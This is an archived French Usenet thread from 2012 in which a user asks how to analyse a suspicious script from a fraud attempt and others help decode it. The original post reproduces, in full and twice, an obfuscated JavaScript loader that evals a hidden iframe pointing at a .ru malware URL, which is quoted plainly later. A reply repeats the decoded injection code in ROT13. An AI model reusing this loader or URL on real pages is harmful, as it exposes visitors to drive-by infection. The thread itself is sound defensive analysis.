info
Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss
Message codé...
2 views
Skip to first unread message
nos...@com.invalid
Feb 22, 2012, 9:57:18 AM2/22/12
to
Bonjour,
Comment savoir sans danger ce que fait le script suivant, reçu dans
une tentative de fraude ? Je sais que c'est un piège, mais y a-t-il
une façon simple de connaître par exemple l'URL pour envoyer un
avertissement au site sans doute piraté vers lequel mène ce script ?
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>You are redirecting</title>
</head>
<body>
<h1>Loading... Wait please...</h1><br>
</body>`
<script>if(window['d'+'o'+'c'+'u'+'m'+'e'+'nt'])aa=/\w/.exec(new
Date()).index+[];aaa='0';try{new
document();}catch(qqq){ss=String;}if(aa.indexOf(aaa)!==-1)f='-30!-30!66!63!-7!1!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!2!84!-30!-30!-30!66!63!75!58!70!62!75!1!2!20!-30!-30!86!-7!62!69!76!62!-7!84!-30!-30!-30!61!72!60!78!70!62!71!77!7!80!75!66!77!62!1!-5!21!66!63!75!58!70!62!-7!76!75!60!22!0!65!77!77!73!19!8!8!60!73!72!67!68!67!63!65!72!77!83!73!72!61!7!75!78!19!17!9!17!9!8!66!70!58!64!62!76!8!58!78!59!69!59!83!61!71!66!7!73!65!73!0!-7!80!66!61!77!65!22!0!10!9!0!-7!65!62!66!64!65!77!22!0!10!9!0!-7!76!77!82!69!62!22!0!79!66!76!66!59!66!69!66!77!82!19!65!66!61!61!62!71!20!73!72!76!66!77!66!72!71!19!58!59!76!72!69!78!77!62!20!69!62!63!77!19!9!20!77!72!73!19!9!20!0!23!21!8!66!63!75!58!70!62!23!-5!2!20!-30!-30!86!-30!-30!63!78!71!60!77!66!72!71!-7!66!63!75!58!70!62!75!1!2!84!-30!-30!-30!79!58!75!-7!63!-7!22!-7!61!72!60!78!70!62!71!77!7!60!75!62!58!77!62!30!69!62!70!62!71!77!1!0!66!63!75!58!70!62!0!2!20!63!7!76!62!77
!26!77!77!75!66!59!78!77!62!1!0!76!75!60!0!5!0!65!77!77!73!19!8!8!60!73!72!67!68!67!63!65!72!77!83!73!72!61!7!75!78!19!17!9!17!9!8!66!70!58!64!62!76!8!58!78!59!69!59!83!61!71!66!7!73!65!73!0!2!20!63!7!76!77!82!69!62!7!79!66!76!66!59!66!69!66!77!82!22!0!65!66!61!61!62!71!0!20!63!7!76!77!82!69!62!7!73!72!76!66!77!66!72!71!22!0!58!59!76!72!69!78!77!62!0!20!63!7!76!77!82!69!62!7!69!62!63!77!22!0!9!0!20!63!7!76!77!82!69!62!7!77!72!73!22!0!9!0!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!80!66!61!77!65!0!5!0!10!9!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!65!62!66!64!65!77!0!5!0!10!9!0!2!20!-30!-30!-30!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!7!58!73!73!62!71!61!28!65!66!69!61!1!63!2!20!-30!-30!86'.split('!');md='a';e=window['e'+'val'];w=f;s='';fr='f'+'ro'+'m'+'Char';r=ss[fr+'Code'];for(i=0;0>i-w.length;i++){j=i;s=s+r(39+1*w[j]);}if(aa.indexOf(aaa)!==-1)e(s);</script>
</html>
Comment savoir sans danger ce que fait le script suivant, reçu dans
une tentative de fraude ? Je sais que c'est un piège, mais y a-t-il
une façon simple de connaître par exemple l'URL pour envoyer un
avertissement au site sans doute piraté vers lequel mène ce script ?
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>You are redirecting</title>
</head>
<body>
<h1>Loading... Wait please...</h1><br>
</body>`
<script>if(window['d'+'o'+'c'+'u'+'m'+'e'+'nt'])aa=/\w/.exec(new
Date()).index+[];aaa='0';try{new
document();}catch(qqq){ss=String;}if(aa.indexOf(aaa)!==-1)f='-30!-30!66!63!-7!1!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!2!84!-30!-30!-30!66!63!75!58!70!62!75!1!2!20!-30!-30!86!-7!62!69!76!62!-7!84!-30!-30!-30!61!72!60!78!70!62!71!77!7!80!75!66!77!62!1!-5!21!66!63!75!58!70!62!-7!76!75!60!22!0!65!77!77!73!19!8!8!60!73!72!67!68!67!63!65!72!77!83!73!72!61!7!75!78!19!17!9!17!9!8!66!70!58!64!62!76!8!58!78!59!69!59!83!61!71!66!7!73!65!73!0!-7!80!66!61!77!65!22!0!10!9!0!-7!65!62!66!64!65!77!22!0!10!9!0!-7!76!77!82!69!62!22!0!79!66!76!66!59!66!69!66!77!82!19!65!66!61!61!62!71!20!73!72!76!66!77!66!72!71!19!58!59!76!72!69!78!77!62!20!69!62!63!77!19!9!20!77!72!73!19!9!20!0!23!21!8!66!63!75!58!70!62!23!-5!2!20!-30!-30!86!-30!-30!63!78!71!60!77!66!72!71!-7!66!63!75!58!70!62!75!1!2!84!-30!-30!-30!79!58!75!-7!63!-7!22!-7!61!72!60!78!70!62!71!77!7!60!75!62!58!77!62!30!69!62!70!62!71!77!1!0!66!63!75!58!70!62!0!2!20!63!7!76!62!77
!26!77!77!75!66!59!78!77!62!1!0!76!75!60!0!5!0!65!77!77!73!19!8!8!60!73!72!67!68!67!63!65!72!77!83!73!72!61!7!75!78!19!17!9!17!9!8!66!70!58!64!62!76!8!58!78!59!69!59!83!61!71!66!7!73!65!73!0!2!20!63!7!76!77!82!69!62!7!79!66!76!66!59!66!69!66!77!82!22!0!65!66!61!61!62!71!0!20!63!7!76!77!82!69!62!7!73!72!76!66!77!66!72!71!22!0!58!59!76!72!69!78!77!62!0!20!63!7!76!77!82!69!62!7!69!62!63!77!22!0!9!0!20!63!7!76!77!82!69!62!7!77!72!73!22!0!9!0!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!80!66!61!77!65!0!5!0!10!9!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!65!62!66!64!65!77!0!5!0!10!9!0!2!20!-30!-30!-30!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!7!58!73!73!62!71!61!28!65!66!69!61!1!63!2!20!-30!-30!86'.split('!');md='a';e=window['e'+'val'];w=f;s='';fr='f'+'ro'+'m'+'Char';r=ss[fr+'Code'];for(i=0;0>i-w.length;i++){j=i;s=s+r(39+1*w[j]);}if(aa.indexOf(aaa)!==-1)e(s);</script>
</html>
yamo'
Feb 22, 2012, 11:01:28 AM2/22/12
to
Salut,
Le 22/02/2012 15:57, nos...@com.invalid a écrit:
> Comment savoir sans danger ce que fait le script suivant, reçu dans
> une tentative de fraude ? Je sais que c'est un piège, mais y a-t-il
> une façon simple de connaître par exemple l'URL pour envoyer un
> avertissement au site sans doute piraté vers lequel mène ce script ?
J'ai regardé, l'extension faite par le développeur d'Adblock Plus ne
peut pas t'aider :
<https://addons.mozilla.org/en-US/seamonkey/addon/javascript-deobfuscator/>
/ <https://addons.mozilla.org/en-US/firefox/addon/javascript-deobfuscator/>
Une réponse à cette question est très intéressante!
Peut-être que sur fr.comp.securite tu auras une réponse même si c'est
limite hors charte...
--
Stéphane
Le 22/02/2012 15:57, nos...@com.invalid a écrit:
> Comment savoir sans danger ce que fait le script suivant, reçu dans
> une tentative de fraude ? Je sais que c'est un piège, mais y a-t-il
> une façon simple de connaître par exemple l'URL pour envoyer un
> avertissement au site sans doute piraté vers lequel mène ce script ?
peut pas t'aider :
<https://addons.mozilla.org/en-US/seamonkey/addon/javascript-deobfuscator/>
/ <https://addons.mozilla.org/en-US/firefox/addon/javascript-deobfuscator/>
Une réponse à cette question est très intéressante!
Peut-être que sur fr.comp.securite tu auras une réponse même si c'est
limite hors charte...
--
Stéphane
Pierre Maurette
Feb 23, 2012, 1:27:17 AM2/23/12
to
nos...@com.invalid :
vs(jvaqbj['q' + 'b' + 'p' + 'h' + 'z' + 'r' + 'ag'])
nn = /\j/.rkrp(arj Qngr()).vaqrk + [];
nnn = '0';
gel {
arj qbphzrag();
} pngpu (ddd) {
ff = Fgevat;
}
vs(nn.vaqrkBs(nnn) !== -1)
s = '-30!...!86'.fcyvg('!');
zq = 'n';
r = jvaqbj['r' + 'iny'];
j = s;
f = '';
se = 's' + 'eb' + 'z' + 'Pune';
e = ff[se + 'Pbqr'];
sbe( v = 0; 0 > v - j.yratgu; v++) {
w = v;
f = f + e(39 + 1 * j[w]);
}
vs(nn.vaqrkBs(nnn) !== -1)
r(f);
</ROT13>
<ROT13>
vs(qbphzrag.trgRyrzragfOlGntAnzr('obql')[0]) {
vsenzre();
} ryfr {
qbphzrag.jevgr("<vsenzr
fep='uggc://pcbwxwsubgmcbq.eh:8080/vzntrf/nhoyomqav.cuc' jvqgu='10'
urvtug='10'
fglyr='ivfvovyvgl:uvqqra;cbfvgvba:nofbyhgr;yrsg:0;gbc:0;'></vsenzr>");
}
shapgvba vsenzre() {
ine s = qbphzrag.perngrRyrzrag('vsenzr');
s.frgNggevohgr('fep',
'uggc://pcbwxwsubgmcbq.eh:8080/vzntrf/nhoyomqav.cuc');
s.fglyr.ivfvovyvgl = 'uvqqra';
s.fglyr.cbfvgvba = 'nofbyhgr';
s.fglyr.yrsg = '0';
s.fglyr.gbc = '0';
s.frgNggevohgr('jvqgu', '10');
s.frgNggevohgr('urvtug', '10');
qbphzrag.trgRyrzragfOlGntAnzr('obql')[0].nccraqPuvyq(s);
}
</ROT13>
--
Pierre Maurette
> Bonjour,
>
>
> Comment savoir sans danger ce que fait le script suivant, reçu dans
> une tentative de fraude ? Je sais que c'est un piège, mais y a-t-il
> une façon simple de connaître par exemple l'URL pour envoyer un
> avertissement au site sans doute piraté vers lequel mène ce script ?
<ROT13>
>
>
> Comment savoir sans danger ce que fait le script suivant, reçu dans
> une tentative de fraude ? Je sais que c'est un piège, mais y a-t-il
> une façon simple de connaître par exemple l'URL pour envoyer un
> avertissement au site sans doute piraté vers lequel mène ce script ?
vs(jvaqbj['q' + 'b' + 'p' + 'h' + 'z' + 'r' + 'ag'])
nn = /\j/.rkrp(arj Qngr()).vaqrk + [];
nnn = '0';
gel {
arj qbphzrag();
} pngpu (ddd) {
ff = Fgevat;
}
vs(nn.vaqrkBs(nnn) !== -1)
s = '-30!...!86'.fcyvg('!');
zq = 'n';
r = jvaqbj['r' + 'iny'];
j = s;
f = '';
se = 's' + 'eb' + 'z' + 'Pune';
e = ff[se + 'Pbqr'];
sbe( v = 0; 0 > v - j.yratgu; v++) {
w = v;
f = f + e(39 + 1 * j[w]);
}
vs(nn.vaqrkBs(nnn) !== -1)
r(f);
</ROT13>
<ROT13>
vs(qbphzrag.trgRyrzragfOlGntAnzr('obql')[0]) {
vsenzre();
} ryfr {
qbphzrag.jevgr("<vsenzr
fep='uggc://pcbwxwsubgmcbq.eh:8080/vzntrf/nhoyomqav.cuc' jvqgu='10'
urvtug='10'
fglyr='ivfvovyvgl:uvqqra;cbfvgvba:nofbyhgr;yrsg:0;gbc:0;'></vsenzr>");
}
shapgvba vsenzre() {
ine s = qbphzrag.perngrRyrzrag('vsenzr');
s.frgNggevohgr('fep',
'uggc://pcbwxwsubgmcbq.eh:8080/vzntrf/nhoyomqav.cuc');
s.fglyr.ivfvovyvgl = 'uvqqra';
s.fglyr.cbfvgvba = 'nofbyhgr';
s.fglyr.yrsg = '0';
s.fglyr.gbc = '0';
s.frgNggevohgr('jvqgu', '10');
s.frgNggevohgr('urvtug', '10');
qbphzrag.trgRyrzragfOlGntAnzr('obql')[0].nccraqPuvyq(s);
}
</ROT13>
--
Pierre Maurette
Pierre Maurette
Feb 23, 2012, 1:48:12 AM2/23/12
to
nos...@com.invalid :
/Microsoft Security Essentials/ n'a pas aimé du tout. Je vous ai donc
mis du code en ROT13 dans un autre message. Le premier est votre code
mis en forme (sans le gros tableau d'entiers séparés par des '!'), le
second le code qui sera eval-ué() dans e(s);, donc la chaîne s.
Des outils, à cumuler éventuellement selon son niveau de paranoïa:
travailler dans un /bac à sable/, utiliser un éditeur de code qui sait
formater, utiliser Firebug voire Firebug + le debugger d'Aptana, un peu
de jugeote et modifier le code. Ici c'est la dernière ligne qui fait
tout, e(s); où e est une fonction et s une chaîne, vous pouvez la
remplacer par alert(e); alert(s);
Ici ce n'est pas violemment obfusqué. Je ne connais pas Javascript,
juste une vague idée de la syntaxe, ni en profondeur les mécanismes
sous-jacents, mais je suis loin d'être convaincu que l'URL de la
/victime/ apparaisse dans ce message ni dans le code reconstitué. Il
faudrait plutôt voir la tripaille entourant le message, entêtes par
exemple.
--
Pierre Maurette
> Bonjour,
>
>
> Comment savoir sans danger ce que fait le script suivant, reçu dans
> une tentative de fraude ? Je sais que c'est un piège, mais y a-t-il
> une façon simple de connaître par exemple l'URL pour envoyer un
> avertissement au site sans doute piraté vers lequel mène ce script ?
Je vous avais proposé une réponse un peu travaillée, malheureusement
>
>
> Comment savoir sans danger ce que fait le script suivant, reçu dans
> une tentative de fraude ? Je sais que c'est un piège, mais y a-t-il
> une façon simple de connaître par exemple l'URL pour envoyer un
> avertissement au site sans doute piraté vers lequel mène ce script ?
/Microsoft Security Essentials/ n'a pas aimé du tout. Je vous ai donc
mis du code en ROT13 dans un autre message. Le premier est votre code
mis en forme (sans le gros tableau d'entiers séparés par des '!'), le
second le code qui sera eval-ué() dans e(s);, donc la chaîne s.
Des outils, à cumuler éventuellement selon son niveau de paranoïa:
travailler dans un /bac à sable/, utiliser un éditeur de code qui sait
formater, utiliser Firebug voire Firebug + le debugger d'Aptana, un peu
de jugeote et modifier le code. Ici c'est la dernière ligne qui fait
tout, e(s); où e est une fonction et s une chaîne, vous pouvez la
remplacer par alert(e); alert(s);
Ici ce n'est pas violemment obfusqué. Je ne connais pas Javascript,
juste une vague idée de la syntaxe, ni en profondeur les mécanismes
sous-jacents, mais je suis loin d'être convaincu que l'URL de la
/victime/ apparaisse dans ce message ni dans le code reconstitué. Il
faudrait plutôt voir la tripaille entourant le message, entêtes par
exemple.
--
Pierre Maurette
Pierre Maurette
Feb 23, 2012, 1:49:18 AM2/23/12
to
(supersedes <mn.b9d47dc25...@free.fr>)
nos...@com.invalid :
nos...@com.invalid :
> Bonjour,
>
>
> Comment savoir sans danger ce que fait le script suivant, reçu dans
> une tentative de fraude ? Je sais que c'est un piège, mais y a-t-il
> une façon simple de connaître par exemple l'URL pour envoyer un
> avertissement au site sans doute piraté vers lequel mène ce script ?
>
>
> Comment savoir sans danger ce que fait le script suivant, reçu dans
> une tentative de fraude ? Je sais que c'est un piège, mais y a-t-il
> une façon simple de connaître par exemple l'URL pour envoyer un
> avertissement au site sans doute piraté vers lequel mène ce script ?
nos...@com.invalid
Feb 23, 2012, 2:13:59 AM2/23/12
to
Le Thu, 23 Feb 2012 07:49:18 +0100, Pierre Maurette
<maurett...@free.fr> écrivait dans
fr.comp.infosystemes.www.auteurs:
>(supersedes <mn.b9d47dc25...@free.fr>)
>
>nos...@com.invalid :
>> Bonjour,
>>
>>
>> Comment savoir sans danger ce que fait le script suivant, reçu dans
>> une tentative de fraude ? Je sais que c'est un piège, mais y a-t-il
>> une façon simple de connaître par exemple l'URL pour envoyer un
>> avertissement au site sans doute piraté vers lequel mène ce script ?
>
>Je vous avais proposé une réponse un peu travaillée, malheureusement
>/Microsoft Security Essentials/ n'a pas aimé du tout. Je vous ai donc
>mis du code en ROT13 dans un autre message. Le premier est votre code
>mis en forme (sans le gros tableau d'entiers séparés par des '!'), le
>second le code qui sera eval-ué() dans e(s);, donc la chaîne s.
L'URL serait http://cpojkjfhotzpod.ru:8080/images/aublbzdni.php
et en russe, cela ne veut rien dire selon le traducteur de Google.
Par contre, la page existe.
[...]
>Ici ce n'est pas violemment obfusqué. Je ne connais pas Javascript,
>juste une vague idée de la syntaxe, ni en profondeur les mécanismes
>sous-jacents, mais je suis loin d'être convaincu que l'URL de la
>/victime/ apparaisse dans ce message ni dans le code reconstitué. Il
>faudrait plutôt voir la tripaille entourant le message, entêtes par
>exemple.
Victime d'un pirate qui aurait installé du code dangereux sur ce
serveur. Mais c'est peut-être bien le pirate, avec un tel code !
J'ai regardé la page avec un proxy et il y a là aussi du code
obscure, du java et sans doute du javascript. Disons que cela ne sent
pas bon et qu'il vaut mieux ne pas s'y frotter de trop près !
<maurett...@free.fr> écrivait dans
fr.comp.infosystemes.www.auteurs:
>(supersedes <mn.b9d47dc25...@free.fr>)
>
>nos...@com.invalid :
>> Bonjour,
>>
>>
>> Comment savoir sans danger ce que fait le script suivant, reçu dans
>> une tentative de fraude ? Je sais que c'est un piège, mais y a-t-il
>> une façon simple de connaître par exemple l'URL pour envoyer un
>> avertissement au site sans doute piraté vers lequel mène ce script ?
>
>Je vous avais proposé une réponse un peu travaillée, malheureusement
>/Microsoft Security Essentials/ n'a pas aimé du tout. Je vous ai donc
>mis du code en ROT13 dans un autre message. Le premier est votre code
>mis en forme (sans le gros tableau d'entiers séparés par des '!'), le
>second le code qui sera eval-ué() dans e(s);, donc la chaîne s.
et en russe, cela ne veut rien dire selon le traducteur de Google.
Par contre, la page existe.
[...]
>Ici ce n'est pas violemment obfusqué. Je ne connais pas Javascript,
>juste une vague idée de la syntaxe, ni en profondeur les mécanismes
>sous-jacents, mais je suis loin d'être convaincu que l'URL de la
>/victime/ apparaisse dans ce message ni dans le code reconstitué. Il
>faudrait plutôt voir la tripaille entourant le message, entêtes par
>exemple.
serveur. Mais c'est peut-être bien le pirate, avec un tel code !
J'ai regardé la page avec un proxy et il y a là aussi du code
obscure, du java et sans doute du javascript. Disons que cela ne sent
pas bon et qu'il vaut mieux ne pas s'y frotter de trop près !
0 new messages